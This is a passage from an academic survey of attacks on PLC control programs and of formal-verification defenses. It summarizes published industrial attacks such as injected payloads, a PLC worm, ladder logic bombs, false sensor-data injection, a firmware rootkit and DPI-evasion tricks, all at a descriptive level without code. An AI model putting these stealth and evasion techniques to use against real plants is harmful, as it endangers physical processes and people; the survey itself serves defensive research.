Chassis, Scapy Xiao 16 [92] W4 GI4 both State verif. Sensor , PLC generic N/A Abbasi 16 [3] W4 GI2 both Others N/A Codesys-based Codesys platform Yoo 19 [94] W5 GI1 both Others ES,PLC Schneider/AB DPI and detection tools LLB [43] W4,6 GI1,GI2 both Programmer ES,PLC LD, AB Studio 5000, RSLinx, LLB CaFDI [69] W4 GI4 both State verif. N/A generic CaFDIT3runtime HAR VEY [37] W4,5 GI4,GC both ES ES,PLC AB Hex, dis-assembler, EMS Engineering Station (ES), Allen-Bradley (AB). Tools: vulnerability (vul.). Detection to evade: veri cation (verif.). trolled process, so that modi ed binaries could deploy meaningful and impactful attacks. 4.1.3. T3: program runtime. At this level, existing studies investigated two types of attacks: the program modi cation attack, and the program input manipulationattack. The input of the program could either come fromthe communication between the PLC and the engineeringstation, or the sensor readings. Program modi cation attack. this requires reverse engineering and payload injection, similar to studies inT2. The difference is that, given the PLC memory lay-out available, and the features supported by the PLC,the design of payload becomes more targeted. Throughinjecting malicious payload to the code, PLCInject [58]and PLC-Blaster [85] presented the widespread impactof the malicious payload. PLCInject crafted a payloadwith a scanner and proxy. Due to the prede ned memorylayout of Siemens Simatic PLCs, PLCInject injected thispayload at the rst organization block (OB) to change theinitialization of the system. This attack turned the PLCinto a gateway of the network of PLCs. Using PLCIn-ject, Spenneberg [85] implemented a worm, PLC-Blaster,that can spread among the PLCs. PLC-Blaster spread byreplicating itself and modifying the target PLCs to executeit along with the already installed programs. PLC-Blasteradopted several anti-detection mechanisms, such as avoid-ing the anti-replay byte, storing at a less used block, andmeeting the scan cycle limit. PLCInject and PLC-Blasterachieved G3and demonstrated the widespread impact of program injection attacks. In addition to that, Senthivel et.al [83] introduced several malicious payloads that could deceive the engi-neering station. Since the engineering station periodicallychecks the running program from the PLC, the attackerscould deceive it by providing an uninfected program whilekeep executing the infected program in the PLC. Sen-thivel achieved this through a self-developed decompiler(laddis) for LD programs. Senthivel also introduced threestrategies to achieve this denial of engineering operationattacks. In a similar setting, Kalle et.al [54] presented CLIK. After payload injection, CLIK implemented a virtual PLC,which simulated the network traf c of the uninfected PLC,and fed this traf c to the engineering station to deceivethe operators. These two works employed a full chain ofvulnerabilities at the network level, without accessing theengineering station nor the PLCs. Input manipulation through the network. several studies [11], [64] hijacked certain network packets be-tween the engineering station and a PLC. Beresford et.al [11] exploited a packet (e.g. ISO-TSAP) between thePLC and the engineering station. These packets providedprogram information, such as variable names, data blocknames, and also the PLC vendor and model. Attackerscould modify these variables to cause undesired behavior.With memory probing techniques, attackers could get amapping between these names to the variables in the PLC.This would allow them to modify the program based onneeds. This attack could cause damages to the physicalprocesses. However, the chance for successful mappingof the variables through memory probing is small. In anuclear power plant setting, Lim et.al [64] intercepted and modi ed the command-37 packets sent between theengineering station and the PLC. This packet providedinput to an industrial-grade PLC consisted of redundantmodules for recovery. The attack caused common-modefailures for all the modules. These attacks made the entry point through the net- work traf c. However, they ignored the fact that securitysolutions could have enabled deep packet inspection (DPI)between the PLC and the engineering station. Modi edpackets with malicious code or input data could have beendetected before reaching the PLC. To evade DPI, Yooet.al [94], [95] presented stealthy malware transmission, by splitting the malware into small fragments and trans-mitting one byte per packet with a large size of noises.This is because DPI merges packets for detection and thuswas not able to detect small size payload. On the PLCside, Yoo leveraged a vulnerability to control the receivedmalicious payload, discard the padded noises, and con g-ure the start address for execution. Although dependenton multiple vulnerabilities, this study provided insight forstealthy program modi cation and input manipulation atthe network level. Input manipulation through sensor. existing studies [3], [43], [69], [92] explored different approaches to evadevarious behavior detection, and to achieve G1. 390 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Govil et.al [43] presented Ladder logic bombs (LLB), which was a combination of program injection and input manipulation attacks. The malicious payload was injectedinto the existing LD program, as a subroutine, and couldbe triggered by a certain condition. Once triggered, thismalware could replace legitimate sensor readings withmanipulated values. LLB was designed to evade manualinspection, by giving instructions names similar to com-monly used ones. LLB did not consider behavior detection, such as state veri cation, or state estimation. To counter B uchi automaton based state estimation, CaFDI [69] introducedcontroller-aware false data injection attacks. CaFDI re-quired high-level information of the physical processes,and monitored I/O traces of the program. It rst con-structed a B uchi automaton model of the program based on its I/O traces, and then searched for a set of inputsthat may cause the model to produce the desired mali-cious behavior. CaFDI calculated the Cartesian productof the safe model and the unsafe model, and recursivelysearched for a path that could satisfy the unsafe modelin the formalization. The resulting path of input wouldbe used as the sensor readings for the program. To staystealthy, CaFDI avoided noticeable inputs, such as an LEDindicator. Xiao [92] ne tuned the undesired model toevade existing sequence-based fault detection [57]. Anattacker could rst construct a discrete event model fromthe collected fault-free I/O traces using non-deterministicautonomous automation with output (NDAAO), and thenbuild a word set of NDAAO sequences, and nally, searchfor the undetectable false sequences from the word set toinject into the compromised sensors. Similarly, by com-bining the control ow of the program, Abbasi et.al [3] presented con guration manipulation attacks by exploitingcertain pin control operations, leveraging the absence ofhardware interrupts associated to the pins. To evade the general engineering operations, Garcia [37] developed HARVEY , a PLC rootkit at the rmwarelevel that can evade operators viewing the HMI. HAR-VEY faked sensor input to the control logic to generateadversarial commands, while simulated the legitimate con-trol commands that an operator would expect to see. Inthis way, HARVEY could maximize the damage to thephysical power equipment and cause large-scale failures,without operators noticing the attack. HARVEY assumedaccess to the PLC rmware, which was less monitoredthan the control logic program. These studies make it practical to inject malicious payloads either through a compromised network or in-secure sensor con gurations. Because of the stealthiness,it remains challenging to design security solutions tocounter. The following details the challenges. 4.2. Challenges Expanded attack input surfaces. The attack input surfaces for PLC programs are expanding. The aforemen-tioned studies have shown input sources including (1) thecommunication from the engineering station, with certainpackets intercepted and hijacked, (2) internet faced PLCsin the same subnet, and (3) compromised sensors and rmware. It becomes challenging for defense solutions toscope an appropriate threat model, since any componentalong the chain of control could be compromised. Prede ned hierarchical memory layout. Multiple studies leveraged this weakness to perform the attacks.However, traditional defense solutions [22] have seenmany challenges: (1) the address space layout randomiza-tion (ASLR) would be too heavy to meet the scan cycle re-quirements for the PLCs, and would still suffer from code-reuse attacks, (2) control ow integrity based solutionsrequire a substantial amount of memory, and would behard to detect in real-time, or to mitigate the attacks, and(3) the hierarchical memory layout is vendor-speci c, andthe attacks targeting them are product-driven, for example,Siemens Simatic S7 [11], [85]. It is challenging to designa lightweight and generalized defense solution. Con dentiality and integrity of the program I/O. The majority of the studies depended on the program I/Oto perform attacks, either to extract information of thephysical processes, and possible detection methods, or tomanipulate input to produce unsafe behaviors. ProtectingI/O is challenging in that (1) the input surfaces of the pro-grams are expanding, (2) sensors and physical processescould be public infrastructure, and (3) the I/O has to beupdated frequently to meet the scan cycle requirement. Stealthy attack detection. We have mentioned many stealthiness strategies based on different threat models, in-cluding (1) disguising malicious code as human errors, (2)code obfuscation with fragmentation and noise padding toevade DPI, (3) crafting input to evade state estimationand veri cation algorithms, (4) using speci c memoryblock or con guration of the PLC, and (5) deceivingthe engineering station with faked legit behaviors. It ischallenging for a defense solution to capture these stealthyattacks. Implicit or incomplete speci cations. Multiple stud- ies have shown crafted attacks using the implicit properties[68] [70]. The dif culties of de ning precise and com-plete speci cations lie in that (1) product requirementsmay change over time thus requiring update of semanticson inputs and outputs, (2) limited expressiveness can leadto incompleteness, while over expressiveness may lead toimplicitness, and (3) domain-speci c knowledge is usuallyneeded. It is challenging to design speci cations thatovercome these dif culties. 5. Formal Veri cation based Defenses A large body of research uses formal veri cation for PLC safety and security, as Table 3shows. This study mainly focused on the following aspects: Behavior Modeling: Modeling the behavior of theprogram as a state-based, ow-oriented, or time-dependent representation. State Reduction: Reducing the state space to im-prove search ef ciency. Speci cation Generation: Generating the speci -cation with desired properties as a temporal logicformula. Veri cation: Applying model checking or theoremproving algorithms to verify the security or safety ofthe PLC program. 391 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Based on these aspects, the following discusses de- fense methodologies. We use the same threat models, security goals, and weaknesses as mentioned in Section3.2. 5.1. Behavior Modeling The goal of behavior modeling is to obtain a formal representation of the PLC program behavior, so that givena speci cation, a formal veri cation framework can un-derstand and verify it. The following discusses behaviormodeling, based on different threat models. 5.1.1. T1: program source code. At the source code level, a line of studies [4], [30], [41], [76] have investi- gated the formal modeling of generic program behaviors.The majority of them translated programs to automata and Petri nets, since they were well supported by most formalveri cation frameworks [4]. These translations usuallyconsider each program unit as an automaton, includingthe main program, functions, and function block instances.Each variable de ned in the program unit was translated asa corresponding variable in the automaton. Input variablesare assigned non-deterministically at the beginning of eachPLC cycle. The whole program was modeled as a network of automata , where a transition represents the changes of variable values in different execution cycles, and asynchronization pair represents synchronized transitions of function calls. In a similar modeling method, Newellet.al [76] translated FBD programs to Prototype Veri ca- tion System (PVS) models, since certain nuclear powergenerating station can only support such representation. These studies could formally model most PLC behav- iors, especially the internal logic within the PLC code.However, with only source code available, behavior mod-eling lacks the interaction with the PLC hardware, and thephysical processes, which might cause unsafe or maliciousbehaviors to bypass later formal veri cation. The follow-ing discusses behavior modeling with more informationavailable. 5.1.2. T2: program bytecode/binary. Fewer studies have investigated behavior modeling at the program binary level. The challenges lie in reverse engineering. As men-tioned in existing works [71], [100], several PLC featuresare not supported in the normal instruction sets. PLCs aredesigned with hierarchical addressing using a dedicatedmemory area for the input and output buffers. The functionblocks use a parameter list with xed entry and exit points.PLCs also support timers that act differently between bit-logic instructions and arithmetic instructions. Thanks to an open-source library [60], which can disassemble Siemens PLC binary programs into STL (ILequivalent for Siemense) programs, several works [21],[71], [93], [100] studied modeling Siemens binary pro-grams. Based on the STL program, TSV [71] leveragedan intermediate language, ILIL, to allow more completeinstruction modeling. With concolic execution, TSV ob-tained the information ow from the system registersand the memory. After executing multiple scan cycles,a temporal execution graph was constructed to representthe states of the controller code. After TSV , Zonouz et.al [100] adopted the same modeling. Chang et.al [21] andXie et.al [93] constructed control ow graphs with similar executable paths. Chang deduced the output states ofthe timer based on the existing output state transitionrelationships, while Xie used constraints to model theprogram. Combined with studies at T1, these studies could handle more temporal features, such as varied scan cyclelengths, and enabled input dependent behavior model-ing. With control ow based representation, nested logicand pointers could also be supported. However, withoutconcrete execution of the programs, the drawbacks areobvious: (1) the input vectors were either random or haveto be manually chosen, (2) the number of symbolic stateslimited the program sizes, (3) the temporal informationfurther increased resource consumption. Next, we discussbehavior modeling with runtime information. 5.1.3. T3: program runtime. With runtime information, existing research [19], [53], [65], [98], [99] modeled pro- grams considering its interactions with the physical pro-cesses, the supervisor, and the operator tasks. This allowedmore realistic modeling for timing sensitive instructions,and domain-speci c behavior modeling. Automated frameworks [91], [99] were presented to model PLC behaviors with interrupt scheduling, functioncalls, and IO traces. Zhou et.al [99] adopted an environ- ment module for the inputs and outputs, an interruptionmodule for time-based instructions, and a coordinatormodule to schedule these two modules with the mainprogram. Wang et.al [91] automated a BIP (Behavior, Interaction, Priority) framework to formalize the scanningmode, the interrupt scheduler, and the function calls. Mesliet.al [72] presented a component-based modeling for the whole control-command chain, with each component de-scribed as timed automata. To automate modeling of domain-speci c event behav- ior, VetPLC [98] generated timed event causality graphs(TECG) from the program, and the runtime data traces.The TECG maintained temporal dependencies constrainedby machine operations. These studies removed the barrier from modeling event-driven and domain-speci c behaviors. They couldmitigate attacks violating security and safety requirementsvia special sequences of valid logic. 5.1.4. Challenges. Lack of plant modeling. Galvao et.al [36]h a v e pointed out the importance of plant models in formal veri cation. However, existing studies focused on theformalization of PLC programs, rather than the I/O of theprograms that directly re ect the behavior of the physicalprocesses (e.g. plant). Under T3, a few studies considered program I/O during behavior modeling. However, theyeither consider I/O as a generic module working togetherwith the other modules [91], [99], or informally use datamining on program I/O to extract program event sequences[98]. It remains challenging to formalize plant models inimproving PLC program security. Lack of modeling evaluation. The majority of the studies only adopted one modeling method to obtain aprogram representation. We understood the representationis compatible with the formal veri cation framework. 392 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. However, there were no scienti c comparisons between models from different studies, except some high-leveldescriptions. Within one model, only a few studies [ 20], [69], [98] evaluated the number of states in their rep-resentations. It is even more dif cult to understand theperformance of the model from the security perspective. State explosion. The aforementioned studies have already adopted an ef cient representation that transformsa program unit as a state automaton, and formalizes thestate transition between the current cycle and the next cy-cle. A less ef cient model representation transforms eachvariable of a program as a state, and formalize the transi-tion between the states. Even though such representationcan bene t PLC programs in any language, it produceslarge size models containing too many states to be veri ed,even for small and medium-sized programs. Therefore, inpractice, most of the programs are modeled in the formeref cient representation. For large size programs, however,both representations will produce large amounts of statecombinations, causing the state explosion problem. Thefollowing describes research works in state reduction. 5.2. State Reduction The goal of state reduction is to improve the scalability and complexity of PLC program formalization. There aretwo common steps involved. First, we have to determinethe meaningful states related to safety and security prop-erties. Then, we trim the less meaningful states. 5.2.1. T1: program source code. At the source code level, a line of studies [25], [29], [42], [79] performed state reduction. Gourcuff et.al [42] considered the meaningful states as those related to the input and output variables,since they directly control the behavior of the physicalprocesses. To obtain the dependency relations of the in-put and output variables, Gourcuff conducted static codeanalysis to get variable dependencies in a ST program,and found a large portion of the unrelated states. Eventhough this method signi cantly reduced the state searchspace, it also skipped much of the original code for thefollowing veri cation. To improve the code coverage of the formalization, Pavlovic et.al [79] presented a general solution for FBD programs. They rst transformed the graphical programto textual statements in textFBD, and further substituted the circuit variables to tFBD. This approach removed the unnecessary assignments connecting continuous state-ments and merged them into one. On top of this ap-proach, Darvas et.al ne tuned the reduction heuristicswith a more complete representation [ 25], [29]. Besides unnecessary variable or logic elimination, these heuristicsadopted the Cone of in uence (COI)-based reduction, andthe rule-based reduction. The COI-based reduction rstremoved unconditional states that all possible executionsgo through. It then removed variables that do not in uencethe evaluation of the speci cation. The rule-based reduc-tion could be speci ed based on the safety requirements ofthe application domain. Additionally, math models werealso used to abstract different components. Newell et.al [76] de ned additional structure, attribute maps, graphs,and block groups to reduce the state space of their PVScode.These studies successfully reduced the size of program states. They were limited, however, to basic Boolean rep-resentation reduction. For programs with complex time-related variables, function blocks, or multitasks, thesestudies were insuf cient. It was also unclear whether thereduction could undermine program security. The fol-lowing discusses other reduction techniques when suchinformation is present. 5.2.2. T2: program bytecode/binary. Studies at the bi- nary level mostly adopted symbolic execution combined with ow-based representation. This demonstrated thatmeaningful states lead to different symbolic output vec-tors. TSV [71] merged the input states that could all leadto the same output values. It also abstracted the temporalexecution graphs, by removing the symbolic variablesbased on their product with the valuations of the LTLproperties. To further reduce the unrelated states, Chang et.al [21] reduced the overlapping output states of the samescan cycle, and removed the output states that had beenanalyzed in previous cycles. To reduce the overhead oftimer modeling, they employed a deduction method for theoutput states of timers, through the analysis of the existingoutput state transition relationships These reductions didnot undermine the goal of detecting malicious behaviorsspanning multiple cycles. Compared with T1, these studies were more interested in preserving temporal features, and targeted the reduc-tion from random inputs in symbolic execution. However,without undermining the temporal feature modeling, thereduction of input states was inef cient given the lack ofreal inputs. The following discusses the reduction tech-niques when runtime inputs are available. 5.2.3. T3: program runtime. With runtime information, we could gain a better understanding of the real mean- ingful states. These include the knowledge from eventscheduling for subroutine and interrupts, and the realinputs and outputs from the domain-speci c processes. Existing studies [53], [65], [98], [99] presented state reduction in different approaches. To reduce the scale ofthe model, Zhou et.al [99] modeled timers inline with the main program instead of a separate automata, since theirmodel had considered the real environment traces, theinterruptions, and the scheduling between them. Similarly,Wang et.al [91] compressed segments without jump and call instructions into one transition. Besides merging unnecessary states, the real inputs and domain-speci c knowledge could narrow down therange for modeling numerical and oat variables. InZhang s study [98], continuous timing behavior was dis-cretized to multiple time slices with a constant interval.Since the application-speci c IO traces are available, thetime interval was narrowed to a range balancing betweenef ciency and precision. Compared with studies at T1and T2, state reduction atT3was more powerful, not only with more realistic temporal and event-driven features supported, but alsohelped to extract more meaningful states with domain-speci c runtime information. 5.2.4. Challenges. 393 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Lack of ground truth for continuous behavior. We discussed that runtime traces helped to determine a realistic granularity for continuous behaviors. However,choosing the granularity was still experience-based andad-hoc. In fact, a too coarse granularity would fail todetect actual attacks, while a too ne granularity expectedinfeasible attack scenarios [36]. Abstracting a groundtruth model for continuous behavior remains challenging. Implicitness and stealthy attacks from reduction. Although existing studies have considered property preser-vation, the reduced unrelated states may underminePLC security. We mentioned in Section 4that implicit speci cation had led to attacks. The reduced states maycause the implicit mapping between the variables in theprogram and its speci cation, or they may contain stealthybehaviors that were simply omitted by the speci cation.The following discusses research on speci cation genera-tion. 5.3. Speci cation Generation The goal of these studies is to generate safety and security speci cations with formal semantics. Specify-ing precise and complete desired properties is dif cult.Existing studies focused on two aspects: (1) process-independent properties that describe the overall require-ments for a control system, and (2) domain-speci c prop-erties that require domain expertise. 5.3.1. T1: program source code. At the source code level, a line of studies [13], [27], [28], [41], [47] inves- tigated speci cation generation with process-independentproperties. These properties include avoiding variablelocks, avoiding unreachable operating modes, operatingmodes that are mutually exclusive, and avoiding irrelevantlogic [81]. Existing studies [4], [10], [16], [74], [81] usually adopted CTL or LTL-based formulas to express theseproperties. LTL describes the future of paths, e.g., a con-dition will eventually be true, a condition will be true untilanother fact becomes true, etc. CTL describes invariance and reachability, e.g., the system never leaves the set of states, the system can reach the set of states, respectively.Other variants included ACTL, adopted by Rawlings [81],and ptLTL, adopted by Biallas [12]. Besides CTL and LTL-based formulas, a proof assis- tantwas also investigated to assist the development of for- mal proofs. To formally de ne the syntax and semantics,Biha et.al [13] used a type theory based proof assistant, Coq, to de ne the safety properties for IL programs. Thesemantics concentrated on the formalization of on-delaytimers, using discrete time with a xed interval. BesidesCoq, K framework [47] was also adopted to provide aformal operational semantics for ST programs. K is arewriting-based semantic framework that has been appliedin de ning the semantics for C and Java. Compared withCoq, K is less formal but lighter and easier to read andunderstand. The trade-off is that manual effort is requiredto ensure the formality of the de nition. These studies limited speci cation generation to cer- tain program models. To enable formal semantics for state-based, data- ow-oriented, and time-dependent programmodels, Darvas et.al [27] presented PLCspecif to support various models. These studies provided opportunities for engineers lacking formalism expertise to generate formal and preciserequirements. The proof assistant frameworks even al-lowed generating directly executable programs, e.g. C pro-gram. Nevertheless, only process-independent propertiescould be automated, the following discusses speci cationgeneration with more information available. 5.3.2. T2: program bytecode/binary. As mentioned ear- lier, symbolic execution allowed these studies to support program modeling with numeric and oat variables. Thesevariables provided more room for property de nitions inthe speci cation. TSV [71] de ned properties boundingthe numerical device parameters, such as the maximumdrive velocity and acceleration. Others et.al [21], [93], [100] de ned properties to detect malicious code injection,parameter tampering attacks. Xie et.al [93] expanded the properties to detect stealthy attacks, and denial of serviceattacks. Similar to studies at T1, these studies all adopted LTL- based formalism, and could automate process-independentproperty generation. To accommodate certain attack strate-gies, the speci cation generation was manually de ned. 5.3.3. T3: program runtime. With runtime information available, speci cation generation concentrated more on domain-speci c properties. In a waste water treatmentplant setting, Luccarini et.al [65] applied arti cial neural networks to extract qualitative patterns from the continu-ous signals of the water, such as the pH and the dissolvedoxygen. These qualitative patterns were then mapped tothe control events in the physical processes. The mappingwas logged using XML and translated into formal rulesfor the speci cation. This approach considered the col-lected input and output traces as ground truth for securityand safety properties, and removed the dependencies ondomain expertise. In reality, the runtime traces might be polluted, or contain incomplete properties for veri cation. To ensurethe correctness and completeness of domain-speci c rules,existing studies [36], [98] also considered semi-automated approaches, which combined automated data mining andmanual domain expertise. VetPLC [98] formally de nedthe safety properties, through automatic data mining andevent extraction, aided with domain expertise in craftingsafety speci cations. VetPLC adopted timed propositionaltemporal logic (TPTL), which was more suitable to quan-titatively express safety speci cations. Besides (semi)-automated speci cation generation, Mesli et.al [72] manually de ned a set of rules for the interaction between each component along the chain ofcontrol. The requirements are also written in CTL tempo-ral logic. To assist domain experts in developing formalrules, Wang et.al [91] formalized the semantics for a BIP model for all types of PLC programs. It automatedprocess-independent rules for interrupts, such as, follow-ing the rst come rst serve principle. These studies enabled speci cation generation with domain-speci c knowledge. They thus expanded securityresearch with more concentration on safety requirements. 394 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. 5.3.4. Challenges. Lack of speci cation-re ned programming. Since these studies already assumed the existence of the PLC programs (source code or binary), the generated speci -cation could help re ne the programming and programmodeling. We have mentioned earlier that state reductionconsidered property preserving, and removed irrelevantlogic from program modeling. However, generated prop-erties did not provide direct feedback to the programsource code. In fact, program re nement in a similarapproach of state reduction is promising in eliminatingirrelevant stealthy code from the source. Ad-hoc and unveri ed speci cation translations. Despite the availability of formal semantics and proofassistants, such as Coq, PVS, HOL, existing require-ments are informally de ned in high-level languages, andvary across industrial domains. Existing studies translat-ing these requirements encountered many challenges: (1)tradeoff between an automated but unveri ed approach,or a formal but manual rewriting, (2) the dependencies onprogram language (many studies were based on IL [47],deprecated in IEC 61131-3 since 2013), (3) the rules werebased on sample programs without the complexity of thereal industry. Barrier for automated domain-speci c property generation. Although Luccarini [65] presented a promis- ing approach, it was based on two unrealistic assump-tions: (1) the trace collected from the physical processeswas complete and could be trusted, and (2) the learningalgorithm extracted the rules completely and accurately.Without further proofs (manual domain expertise) to liftthese two assumptions, the extracted properties wouldbe an incomplete white list which may also containimplicitness, leading to false positives or true negativesin the veri cation or detection. Speci cation generation with evolved system de- sign. Increasing requirements were laid on PLC programs, considering the interactions from new components. In thebehavior modeling, we have observed studies formalizingthe behaviors of new interactions, on top of existed mod-els, for example, adding a scheduler module combing anexisted program with a new component. Compared withthat, we saw fewer studies investigating incremental spec-i cation generation, based on existing properties. It wasstill challenging to de ne the properties to synchronizePLC programs with various components, especially in atiming-sensitive fashion. 5.4. Veri cation We already discussed the modeling of program be- havior, and speci cation generation. With these, a line ofstudies [9], [10], [16], [17], [20], [74], [75], [77], [80],[81], [96] applied model checking and theorem provingto verify the safety and security of the programs. These studies applied several formal veri cation frameworks, summarized in Table 2. The majority of them used Uppaal and Cadence SMV . Uppaal was usedfor real-time veri cation representing a network of timedautomata extended with integer variables, structured datatypes, and channel synchronization. Cadence SMV wasused for untimed veri cation. 5.4.1. T1: program source code. At the source code level, formal veri cation studies aimed at verifying weak- nesses W1-W4, to defend against general safety problems. They had been applied by programs from different indus-tries. To defend G1, Bender et.al [10] adopted model check- ing for LD programs modeled as timed Petri nets. Theyapplied model checkers in the Tina toolkit to verify LTLproperties. Bauer et.al [9] adopted Cadence SMV and Uppaal, to verify untimed modeling and timed modelingof the SFC programs, respectively. They identi ed errorsfrom three reactors. Similarly, Niang et.al [77] veri ed a circuit breaker program in SFC using Uppaal, based on arecipe book speci cation. To defend G2, Hailesellasie et.al [44] applied Uppaal and compared two formally generatedattributed graphs, the Golden Model with the properties, and a random model formalized from a PLC program. Theveri cation is based on the comparison of nodes and edgesof the graphs. They detected stealthy code injections. Instead of adopting existing tools, several studies developed their own frameworks for veri cation. Ar-cade.PLC [12] supported model checking with CTL andLTL-based properties for all types of PLC programs.PLCverif [28] supported programs from all ve SiemensPLC languages. NuDE 2.0 [56] provided formal-method-based software development, veri cation and safety anal-ysis for nuclear industries. Rawlings et.al [81] applied symbolic model checking tools st2smv and SynthSMV toverify and falsify a ST program controlling batch reactorsystems. They automatically veri ed process-independentproperties, rooted in W1-W4. Besides model checking, existing studies [76] also adopted PVS theorem proving to verify the safety prop-erties described in tabular expressions in a railway inter-locking system. These studies are limited to general safety require- ments veri cation. To defend G2and G3, more informa- tion will be needed, as discussed in the following. 5.4.2. T2: program bytecode/binary. This line of studies [21], [71], [91], [93], [100] allowed us to detect binary tampering attacks. TSV [71] combined symbolic execution and model checking. It fed the model checker with an abstracted temporal execution graph, with its manually crafted LTL-based safety property. Due to its support for random timervalues within one cycle, TSV was limited by checkingthe code with timer operations, and still suffered fromstate explosion problems. Xie et.al [93] mitigated this problem with the use of constraints in verifying randominput signals. Xie used nuXmv model checker. Chang et.al [21] applied a less formal veri cation based on the numberof states. These studies successfully detected malicious parame- ter tempering attacks, based on sample programs control-ling traf c lights, elevator, water tank, stirrer, and sewageinjector. 5.4.3. T3: program runtime. With runtime information, existing studies could verify domain-speci c safety and 395 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. security issues, namely all the weaknesses and security goals discussed in Section 4. To defend G1by considering the interactions to the program, Carlsson et.al [18] applied NuSMV to verify the interaction between the Open Platform Communica-tions (OPC) interface and the program, using propertiesde ned as server/client states. They detected synchroniza-tion problems, such as jitter, delay, race condition, andslow sampling caused by the OPC interface. Mesli [72]applied Uppaal to multi-layer timed automata, based ona set of safety and usability properties written in CTL.They detected synchronization errors between the controlprograms and the supervision interfaces. To fully leverage the knowledge from the physical processes, VetPLC [98] combined runtime traces, andapplied BUILDTSEQS to verify security properties de- ned in timed propositional temporal logic. HyPLC [ 38] applied theorem prover KeYmaera X to verify the proper-ties de ned in differential dynamic logic. Different fromVetPLC, HyPLC aimed at a bi-directional veri cationbetween the physical processes, and the PLC program,to detect safety violations. These studies either assumed an of ine veri cation, or vaguely mentioned using a supervisory componentfor online veri cation. To provide an online veri cationframework, Garcia et.al [40] presented an on-device run- time solution to detect control logic corruption. Theyleveraged an embedded hypervisor within the PLC, withmore computational power and integration of direct libraryfunction calls. The hypervisor overcame the dif cultiesof strict timing requirements and limited resources, andallowed veri cation to be enforced within each scan cycle. 5.4.4. Challenges. Lack of benchmarks for formal veri cation. Similar to the challenges in behavior modeling, an ideal evaluation should be multi-dimensional: across modeling methods,across veri cation methods, and based on a set of bench-mark programs. Existing evaluations, if performed, werelimited to one dimension and based on at most a few sam-ple programs. These programs were often vendor-speci c,test-case driven, and failed to re ect the real industry com-plexity. Without a representative benchmark and concreteevaluation, the security solution design would still be ad-hoc. Open-source automated veri cation frameworks. Existing studies have presented several open-sourceframeworks taking a PLC program as input, and automati-cally generating the formal veri cation result over genericproperties. These frameworks (e.g. Arcade.PLC, st2smvand the SynSMV) lowered the bar for security analy-sis using formal veri cation. However, over the years,such frameworks were no longer supported. No compara-ble replacement emerged, except PLCverif [26] targetingSiemens programs. High demand for runtime veri cation. The chal- lenges include (1) expanded attack landscapes due toincreasingly complex networking, (2) tradeoff betweenlimited available resources on the PLC and real-timeconstraints, (3) runtime injected stealthy attacks due toinsecure communication, and (4) runtime denial of serviceattacks omitted by existing studies.6. Recommendations We have described and discussed the security chal- lenges in defending against PLC program attacks usingformal veri cation and analysis. Next, we offer recom-mendations to overcome these challenges. Our recom-mendations highlight promising research paths based ona thorough analysis of the state-of-the-art and the currentchallenges. We consider these recommendations equallyrelevant regardless of any particular factor neither men-tioned nor considered in this section that may changethis perception. 6.1. Program Modeling 6.1.1. Plant Modeling. We discussed the lack of formal- ized plant modeling in Section 5.1.4. We recommend more research in plant modeling to formalize more accurateand complete program behaviors. Future research shouldconsider re nement techniques to de ne the granularityand level of abstraction for the plant models and theproperties to verify. The re nement techniques shouldconsider the avoidance of state explosion, by extractingfeasible conditions of the plant that can trigger propertyviolations in the program. 6.1.2. Input manipulation veri cation. Plant modeling is also promising in mitigating program input manipula- tion attacks. As mentioned in Section 4, input manipula- tion is widely adopted by the attackers. Future researchshould consider the Orpheus [23] prototype in a PLCsetting. Orpheus performs event consistency checking be-tween the program model and the plant model to detectinput manipulation attacks. To perform event consistencychecking in a PLC, future research may consider in-strumentation on the input and output variables of theprograms, and compare the values with these from theplant models. 6.2. State Reduction In Section 4.1.1, we discussed code level attacks that could disguise themselves as bad coding practice, and arehard to be noticed. During the state reduction, based onan existed speci cation, unrelated states are trimmed toavoid state explosion problems. However, as mentionedin Section 4.2, existing studies failed to investigate the relationship between the unrelated states and the orig-inal program. It could be hidden jumps with a stealthylogger to leak program critical information. The speci ca-tion might only consider the noticeable unsafe behaviors,which can disturb the physical processes, while let thestates from the stealthy code be recognized as unrelated .We, therefore, recommend future research to investigatethe security validation of unrelated code, and considerautomatic program cleaning for the stealthy code. 6.3. Speci cation Generation 6.3.1. Domain-speci c property de nition. As men- tioned in Section 5.3.4, there are barriers in automatic generation of domain-speci c properties, and manually 396 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. TABLE 2: Common frameworks for formal veri cation Frameworks Modeling LanguagesProperty Languages/ProverSupported Veri cation Techniques NuSMV/nuXMV SMV input language (BDD) CTL, LTL SMT, Model checking, fairness requirements Uppaal Timed automata with clock and data variables TCTL subset Time-related, and probability related properties Cadence SMV SMV input language (BDD) CTL, LTL Temporal logic properties of nite state systems SPIN Promela LTL Model checking UMC UML UCTL Functional properties of service-oriented systems Coq Gallina (Calculus of Inductive Constructions) Vernacular Theorem proof assistant PVS PVS language (typed higher-order logic) Primitive inference Formal speci cation, veri cation and theorem prover Z3 SMT-LIB2 SMT-LIB2 Theories Theorem prover TABLE 3: Existing studies using formal veri cation to detect control logic attacks Thr eat ModelPaperSecurity GoalDefense FocusVeri cation TechniquesPropertyPLC LanguageTools Adie go 15 [4] GI1 BM, SG MC CTL, LTL ST,SFC nuXmv , PLCVerif, Xtext, UNICOS Bauer 04 [9] GI1,GI3 FV MC CTL SFC Cadence SMV , Uppaal Bender 08 [10] GI3 SG, FV MC seLTL LD Tina Toolkit Biallas 12 [12] GI1,GI3 SG, FV MC CTL, ptLTL generic PLCopen, Arcade.PLC*, CEGAR Biha 11 [13] GI1 SG TP N/A IL SSRe ect in Coq, CompCert Brinksma 00 [16] GI3 SG MC N/A SFC SPIN/Promela, Uppaal Darv as 14 [25] GI1 SR MC CTL, LTL ST COI reduction, NuSMV Darv as 15 [27] GI1,GI3 SG EC N/A ST PLCspecif Darv as 16-1 [28] GI1 SG, FV N/A temporal logic ST 